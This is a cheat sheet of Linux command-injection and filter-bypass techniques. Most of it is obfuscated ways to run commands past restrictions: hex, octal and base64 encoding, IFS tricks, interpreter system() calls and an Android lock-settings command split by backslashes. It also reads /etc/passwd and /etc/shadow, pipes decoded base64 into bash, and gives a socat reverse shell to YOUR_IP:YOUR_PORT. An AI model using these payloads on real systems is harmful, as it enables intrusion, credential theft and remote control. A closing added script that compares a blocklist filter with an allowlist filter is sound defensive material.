Linux Bypass Techniques: Commands to Circumvent Restrictions
Explore various Linux bypass techniques to circumvent restrictions using shell commands such as hex encoding, echoing, finding files, and more. Enhance your understanding of shell scripting with these effective methods.
Using hex encoding
$(echo -e "\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x77\x68\x6F\x61\x6D\x69")
Test bypass: cmd locksettings on Android
sh -c \
`\
c\
m\
d\
\ \
l\
o\
c\
k\
_\
s\
e\
t\
t\
i\
n\
g\
s\
\ \
\-\
\-\
v\
e\
r\
i\
f\
y\
\ \
1\
4\
7\
8\
9 \
`
List current files and folders
ls *
Using echo for list all files/dirs
echo *
Using find
find -maxdepth 1
Using awk
awk 'BEGIN {system("ls")}'
awk with ls -1
awk 'BEGIN { cmd="ls -1"; while (cmd | getline line) print line; close(cmd) }'
printf and for-loop
for f in *; do printf '%s\n' "$f"; done
Using find with -exec
find . -maxdepth 1 -exec basename {} \;
Using stat
stat -c '%n' *
Using readlink
for f in *; do readlink -f "$f"; done
Using perl
perl -e 'opendir(DIR, "."); @files = readdir(DIR); foreach $file (@files) { print "$file\n"; } closedir(DIR);'
Using python (inline)
python -c 'import os; [print(f) for f in os.listdir(".")]'
Using ruby
ruby -e 'Dir.foreach(".") {|f| puts f}'
Using tee and process substitution
ls -1 | tee >(cat)
Using grep on ls output
ls -1 | grep '.*'
Using mapfile (Bash 4+)
mapfile -t files < <(ls -1); printf '%s\n' "${files[@]}"
Using xargs with ls
ls -1 | xargs -I {} echo {}
Another example of hex encoding
echo -e '\x70\x69\x6E\x67'
Using ANSI C quoting
echo $'\x70\x69\x6E\x67'
Using printf
printf '\x70\x69\x6E\x67'
Using base64 encoding
# base64 (the string below is base64, so base32 -d would fail to decode it)
$(echo "L2Jpbi9waW5nCg==" | base64 -d)
Base16 (hex) encoding
$(echo 2f62696e2f77686f616d69 | xxd -r -p)
Octal encoding
/usr/bin/who$'\157\141\155\151' # octal encoding
Using command substitution
cat $(echo /etc/passwd)
Variable assignment and indirect reference
cmd="whoami"; $cmd
b=base64; $b -d <<<"Y2F0IC9ldGMvcGFzc3dkCg==" | bash
Using IFS (Internal Field Separator)
IFS='/'; cmd="env/whoami"; $cmd
Using HEREDOC
bash <<HERE
whoami
HERE
Using process substitution
bash <(echo "whoami")
Using functions
f() { whoami; }; f
Using alias
alias p='ping'; p localhost
Using brace expansion
echo /{usr,bin}/whoami
Arithmetic expansion
echo $((0x70,0x69,0x6E,0x67))
PATH modification
PATH=.:/usr/bin:/bin; whoami
Hostname lookup
ping $(host -t a "example.com" | grep "has address" | cut -d" " -f4)
DNS TXT record lookup
dig +short txt "example.com"
Using socat for reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP:YOUR_PORT
Using awk
awk 'BEGIN {system("whoami")}'
Using perl
perl -e 'exec "/usr/bin/whoami";'
Using python
python -c 'import os; os.system("/usr/bin/whoami")'
Using ruby
ruby -e 'exec "/usr/bin/whoami"'
Using vi/vim
vi -c ':!whoami' -c ':q!'
Using ssh
ssh user@localhost whoami
Using env command
env whoami
Using column command
column < /etc/passwd
Using awk with input redirection
awk '{print}' < /etc/passwd
Using grep with a pattern
grep '.*' /etc/passwd
Using sed
sed -n 'p' /etc/passwd
Using tac (reverse cat)
tac /etc/shadow | tac
Using tee
cat /etc/passwd | tee
Using xargs
echo /etc/passwd | xargs cat
Using more/less commands
more /etc/passwd
Using head/tail commands
head -n 5 /etc/passwd
tail -n 5 /etc/passwd
Using look
look '' /etc/passwd
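Why a string blocklist does not stop the encodings listed above, and what an allowlist check looks like instead, as an added example that is not part of the original page. The blocked words, the approved command names and the function names are assumptions; the sample lines are copied from this page as inert text and are never executed.

```sh
#!/bin/sh
# Added example. Samples are copied from this page as inert text ('ls -1' is
# constructed as the benign case); nothing in the list is ever executed.
samples() {
cat <<'EOF'
$(echo -e "\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x77\x68\x6F\x61\x6D\x69")
$(echo 2f62696e2f77686f616d69 | xxd -r -p)
echo $'\x70\x69\x6E\x67'
printf '\x70\x69\x6E\x67'
awk 'BEGIN {system("whoami")}'
env whoami
ls -1
EOF
}

# Naive filter (assumed word list): reject input containing a blocked string.
blocklist_allows() {
  case "$1" in
    *whoami*|*ping*|*/etc/passwd*) return 1 ;;
  esac
  return 0
}

# Allowlist filter (assumed policy): only plain characters, and the first word
# must be an exact, pre-approved command name. Interpreters and launchers such
# as awk, env, vi or find are deliberately not on the list.
allowlist_allows() {
  leftover=$(printf '%s' "$1" | tr -d 'A-Za-z0-9 ./_-')
  [ -z "$leftover" ] || return 1      # quotes, $, \, globs, pipes, ; etc.
  case "${1%% *}" in
    ls|id|date) return 0 ;;
  esac
  return 1
}

# Print how many sample lines the filter named in $1 would let through.
count_passing() {
  samples | {
    n=0
    while IFS= read -r line; do
      if "$1" "$line"; then n=$((n + 1)); fi
    done
    echo "$n"
  }
}

echo "blocklist passes $(count_passing blocklist_allows) of 7 samples"
echo "allowlist passes $(count_passing allowlist_allows) of 7 samples"
```

The allowlist only decides which program may run; its arguments still need their own validation, and the accepted command should be executed without handing the string back to a shell.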